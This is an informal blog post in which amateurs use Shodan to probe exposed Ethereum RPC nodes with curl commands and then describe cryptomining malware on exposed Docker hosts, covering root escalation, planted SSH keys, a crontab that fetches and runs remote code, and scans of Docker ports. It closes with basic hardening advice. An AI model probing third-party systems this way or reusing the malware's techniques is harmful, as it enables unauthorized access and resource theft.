He who plays with fire gets burnt.

Our situation: as always, insomnia, boredom, a whatever! who knows!

The topic of choice: Cryptocurrency. Let’s see if we can escape poverty and go to Fiji.

Stage: The Planet

Browser: Shodan

We apologize in advance to analysts and specialists in this topic, we are just amateurs with silly interests, eager to spree and have a fun time.

First contact

What are we doing today, bro? Trying to escape poverty. Then, let’s try:

Shodan: ethereum.

Interesting research, out of 4572 results, most have the same port: 8545, and almost the same service: Ethereum RPG enabled. After collecting some documentation, it is time to play. Let’s play with the information the protocol gives us.

For example, we want it to give us back the most recent block number:

proxychains curl -s -X POST http://target:8545 -H “Content-Type: application/json” — data ‘{“jsonrpc”:”2.0",”method”:”eth_blockNumber”,”params”:[],”id”:1}’

Result: {“jsonrpc”:”2.0",”result”:”secret”,”id”:1}

and, if we now ask for the number of transactions for this block:

proxychains curl -s -X POST http://target:8545 -H “Content-Type: application/json” — data ‘{“jsonrpc”:”2.0",”method”:”eth_getBlockTransactionCountByNumber”,”params”:[“secret”],”id”:1}’

Result: {“jsonrpc”:”2.0",”result”:”0x79",”id”:1} (121 transactions)

Umm! What if we leave this cryptocurrency for now and try a cooler one, monero.

Second contact, this gets interesting

Shodan: monero.

Here in the result show us we are in the right path.

The first thing we see is not the decrement of the results, what draws our attention is the change of country and that almost everyone has the same cloud service provider. You can check it out if you want, we’re not giving away those details.

The next and certainly the most important thing is the most used service: Docker. What is Docker? We will explain it at the end of this article.

By delimiting the research to those services that are also containers, the results acquire a more than interesting shade, we can clearly see that there is a docker used for mining.

This time, we grab Shodan’s API to download the results and calmly analyze them. The first thing we find is a shell script used to…

Analything a script.

Bro! You’re taking forever to download. Who said fear!

We look at the URLs to pastebin, those we haven’t downloaded yet.

One of those not downloaded ones is a binary file. Now it is time to time to reverse-engineer it! What a drag! Let’s try with some strings!

The strings’ texts tell us that it is a mining docker. Also, we “haven’t” downloaded the docker’s configuration file, what launches the miner, thus, we “don’t” have the user’s hash, the private key, the pool’s connection…

A significant thing to take into account is that the binary file’s name is camouflaged with the name of a quite common process in the servers, a usual practice that is often done when you want to hide something important.

We keep on analyzing. Due to the commands that it executes, commands that only the superuser is able to do, we can say that there is a privilege escalation. It is root!

It creates users and gives them access to sudoers with root permission. It modifies the ssh service’s configuration file, enabling the access with the root user and allowing access with authentication via public key. It restarts the service. It copies the keywords/passwords at the home directory of the created user and root ( ~/.ssh/authorized_keys ). It changes the root’s contrab so each 10 minutes something gets downloaded and executed. We haven’t been able to download this, although we’ve been left wanting to connect to a server and obtain it.

It checks if there are any installed packages, otherwise, it downloads it.

Some pastebin are encrypted, but we can decipher them because we have the public key user’s.

echo “algoquepuso” | base64 -d |openssl rsautl -inkey clave.pub -pubin

It modifies and adds ports from other miners in the local firewall, iptables and/or ufw.

Finally, the attacker, I believe we can call him/her that way, kills all the mining processes that could be there. Logically, he doesn’t want any rivalry!

If you’ve come this far, you get a prize. Twit this article using the hashtag #porquelovalgo and we will buy you a drink, beer, coffee or glass of water.

Another script’s found

The analysis of the search in Shodan reveals us that another script, its analysis shows us that it has nothing to do with the above.

In short:

• It downloads packages like systemd, masscan and iproute2.
• It scans the 2375 and 2379 ports of the server subnet.
• It launches a docker.

This tells us that now it wont try to do mining but to search for vulnerable machines/engines. With the scan of the previous ports it tries to find a docker’s vulnerability that allows the attacker to get root.

Another found command is:

swarm…

This is a clustering native solution for Docker containers. It turns a group of Docker hosts in a single virtual host.

Obtained data

• mining servers’ pool
• user key, hash.
• attacker’s public key…
• Some serves had a DockerUI installed. Thus making our life way easier.

Conclusion

“We’ve gotten our hands on” a group of engines that are mining like crazy, we haven’t said it before, but the attacker puts the cpu at 100% ( — max-cpu-usage=100).

We know how they got in, a Docker’s vulnerability that allows an attacker to elevate privileges and become root.

An important thing we have seen is the us of ngrok, with which it creates a tunnel to a service. This means that the service that it wants to protect is a very important service, it might be your house, a machine that contains important information…

And all this with a simple Shodan consult, searching for cryptocurrency with the single objective to get rich and quit working, finding a servers’ net, assaulted and used to do mining.

We take note of all of this, who knows? Maybe one day we will have the urge to quit working.

A night of games goes a long way. That’s all, folks.

Wait, we haven’t finished yet. Congratulations! You’ve reached the end and you have it: use #porfin as a hashtag and you get the drink and a jamon ibérico tapa and, if you don’t like it, we will prepare a salad for you.

Thank you for your attention.

Recomendations

• Keep your servers updated.
• Filter the connections to/from your servers.
• both at IP and service level.
• Collect the system logs to analyze them, it is a way to see what is happening in your sourroundings.

What is a docker?

Docker is an opensource that allows us to create and use Linux containers.

Ok, and what is a container? That is like a virtual machine: light, modular and flexible.

With a docker you can separate processes that can be executed independently. The independence of each process is quite important because it allows you to have a safer infrastructure.

In the references section there is more documentation in this regard.

References:

https://es.wikipedia.org/wiki/Alibaba_Group

https://www.jsonrpc.org/

https://docs.pylonsproject.org/projects/webob/en/stable/jsonrpc-example.html

https://github.com/ethereum/wiki/wiki

https://github.com/xmrig/xmrig

https://hackernoon.com/bitcoin-core-bug-cve-2018-17144-an-analysis-f80d9d373362

https://github.com/taskcluster/docker-worker

https://hub.docker.com

https://www.exploit-db.com/exploits/42356

https://ngrok.com/